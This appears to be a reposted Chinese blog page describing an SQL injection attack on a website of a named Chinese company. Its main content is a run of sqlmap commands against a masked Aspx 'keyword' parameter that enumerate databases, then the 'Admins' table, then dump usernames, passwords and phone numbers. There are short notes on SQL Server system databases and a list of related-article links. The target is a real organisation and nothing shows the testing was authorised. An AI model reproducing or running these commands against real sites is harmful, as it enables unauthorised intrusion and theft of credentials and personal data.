博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
云南南天电子信息产业股份有限公司某站SQL注入漏洞
阅读量:4522 次
发布时间:2019-06-08

本文共 1130 字,大约阅读时间需要 3 分钟。

 
220.163.13*.**
 
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --dbs --tamper=space2comment --level 3
 
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
 
 
 
 
4个系统级库
master : 起主要控制的作用
master数据库控制SQL Server的所有方面。这个数据库中包括所有的配置信息、用户登录信息、当前正在服务器中运行的过程的信息。
model : 模板
当你建立一个新数据库时,SQL Server会把model数据库中的所有对象建立一份拷贝并移到新数据库中。
tempdb : 临时,访问
供所有来访问你的SQL Server的用户使用,作为用户访问时的容器所用.
msdb : 用户用
所有的任务调度、报警、操作员都存储在msdb数据库中。该库的另一个功能是用来存储所有备份历史。SQL Server Agent将会使用这个库。
 
 
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --table -D 'nantian_web' --tamper=space2comment --level 3 --threads 3
 
 
 
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --columns -T "Admins" -D 'nantian_web' --tamper=space2comment --level 3 --threads 3
 
 
 
 
 
 
 
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --dump -C "id,Name,gsname,username,password,contents,tel" -T "Admins" -D 'nantian_web' --tamper=space2comment --level 3 --threads 3
 
 
 
 
 
 
 
 
 
 
 
 
 
 

转载于:https://www.cnblogs.com/staffyoung/p/5552477.html

你可能感兴趣的文章
【瞎扯】About Me
查看>>
【SQL Server DBA】日常巡检2:windows性能监控器
查看>>
454. 矩阵面积
查看>>
One网络模拟器探索之六:Report类的扩展
查看>>
akka简单示例-1
查看>>
HOJ-1003
查看>>
parkingLot
查看>>
关于Arraylist的Sort排序方法
查看>>
hashCode equals ==
查看>>
重构手法(四)之在对象之间搬移特性
查看>>
Python-认识正则表达式-53
查看>>
NATS_08:NATS客户端Go语言手动编写
查看>>
教你怎么看聚类分析的树状图【转载】
查看>>
格式化后数据的恢复
查看>>
sql查询结果转XML和JSON
查看>>
正确代码 = =
查看>>
OpenCV入门学习资料汇总
查看>>
一款比较好用的JS时间控件-laydate
查看>>
vim分屏功能总结
查看>>
win7/8 访问 访问局域网 默认加载域 而无法成功访问的问题
查看>>